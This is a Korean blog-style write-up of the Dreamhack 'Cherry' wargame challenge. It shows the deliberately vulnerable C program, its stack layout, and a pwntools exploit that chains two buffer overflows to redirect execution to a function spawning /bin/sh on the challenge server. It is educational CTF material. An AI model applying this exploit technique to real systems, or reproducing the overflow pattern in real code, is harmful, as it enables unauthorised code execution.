[Dreamhack] Level 1: Cherry

1. 문제 

https://dreamhack.io/wargame/challenges/959

Cherry

 

2. 해결 과정

(1) 파일 분석 

 

일단 해당 바이너리 파일은 gcc -fno-stack-protector -no-pie chall.c -o chall 로 컴파일 되었기 때문에 주소가 고정되어있다. 

// Compile: gcc -fno-stack-protector -no-pie chall.c -o chall

바이너리 파일을 실행해보면 두 번의 입력을 받게 된다. 

• initialize(): 버퍼링을 비활성화하고, SIGALRM을 이용해 30초 후 자동 종료하는 기능을 설정
• flag(): /bin/sh 실행 함수 < 이걸 실행시키는 것이 목표 
• main(): 다음과 같은 흐름으로 진행됨
  1. initialize() 호출
  2. "Menu: " 메시지 출력
  3. buf(6바이트 크기)에 최대 buf_size(16바이트)만큼 입력을 받음 
  4. 입력이 "cherry"와 같다면 "Is it cherry?: " 메시지를 출력한 후, fruit(6바이트 크기)에 다시 buf_size(16바이트)만큼 입력을 받음 

// Name: chall.c
// Compile: gcc -fno-stack-protector -no-pie chall.c -o chall
 
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
 
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
 
 
void flag() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};
  execve(cmd, args, NULL);
}
 
int main(int argc, char *argv[]) {
    int stdin_fd = 0;
    int stdout_fd = 1;
    char fruit[0x6] = "cherry";
    int buf_size = 0x10;
    char buf[0x6];
 
    initialize();
 
    write(stdout_fd, "Menu: ", 6);
    read(stdin_fd, buf, buf_size);
    if(!strncmp(buf, "cherry", 6)) {
        write(stdout_fd, "Is it cherry?: ", 15);
        read(stdin_fd, fruit, buf_size);
    }
 
    return 0;
}

 

(2) 페이로드 작성 

 

처음에는 단순하게 두번째 입력에서 리턴주소까지의 거리를 구해서 버퍼에 해당 길이의 데이터를 넣어주면 된다고 생각했는데, 일단 16바이트로 길이가 제한되어있고 또한 리턴 주소까지의 길이가 이를 보통 넘기 때문에 해당 방법으로는 플래그를 얻을 수 없다. 

 

먼저 main함수의 스택 프레임 구조를 보면 아래와 같다. 

높은 주소(high address)
+------------------------+
| 리턴 주소               | <-- 여기를 flag() 함수의 주소로 덮어쓰는 것이 최종 목표
+------------------------+
| Saved RBP              |
+------------------------+  rbp 
| stdin_fd (0)           |
+------------------------+  rbp - 0x4
| stdout_fd (1)          |
+------------------------+  rbp - 0x8
| fruit[0x6] ("cherry")  | <-- 두 번째 overflow 발생 지점
+------------------------+  rbp - 0xc
| buf_size (0x10)        | <-- 이 값을 변경하는 것이 1차 목표
+------------------------+ rbp - 0x12
| buf[0x6]               | <-- 첫 번째 overflow 발생 지점
+------------------------+ rbp - 0x18
낮은 주소(low address)

 

실제로 디버깅해보면 buf 변수는 0x7fffffffde18( rbp - 0x18 )에 위치하고, buf_size 는  0x7fffffffde24( rbp - 0xc )에 위치하여 12바이트 거리에 있다는 것을 알 수 있다. 따라서 buf에 입력 가능한 크기는 최대 16 바이트이므로  buf_size 자체를 오버플로우를 통해 덮어써서 크기를 변경할 수 있다는 것이다.

cherry만 입력했을 때

cherry + a*10 입력했을 때

 

또한 두번째 입력값이 들어가는 fruit부터 리턴 주소까지의 거리는 0x12+0x8 = 0x1A(26바이트)이다.

실제로 디버깅해보았을 때 fruit은 rbp - 0x12 (0x7fffffffde1e)에 있는 것을 확인할 수 있다. 

 

따라서 첫번째 입력 뒤에 26바이트를 입력한 뒤 리턴 주소를 flag 주소로 덮어쓰면 쉘을 획득할 수 있을 것이다. 

 

마지막으로 덮어쓸 flag 함수의 주소를 확인하여서 익스플로잇 코드를 작성해주었다.

 

[최종 코드]

from pwn import * 
 
p = remote("host3.dreamhack.games",16112 )
 
flag_addr = 0x4012bc
 
payload = b'cherry'
payload += b'A'*10
 
p.recvuntil(b"Menu: ")
p.send(payload)
 
payload = b'B'*26
payload += p64(flag_addr)
 
p.recvuntil(b"Is it cherry?: ")
p.send(payload)
 
p.interactive()